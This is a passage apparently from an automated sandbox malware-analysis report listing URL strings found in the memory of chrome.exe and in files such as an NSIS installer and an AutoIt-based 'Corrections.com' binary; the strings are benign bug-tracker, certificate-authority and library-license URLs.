Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: lem.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 0000000F.00000003.2125844534.0000413001058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127402260.00004130010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124812731.000041300102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2127686147.000041300120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2124925632.000041300103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126437560.0000413000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126685947.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125068154.0000413000F58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126581456.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126505449.0000413000724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2125027206.000041300108C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Corrections.com, 0000000A.00000000.1730066094.00000000009F5000.00000002.00000001.01000000.00000007.sdmp, Corrections.com.1.dr, Appeals.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
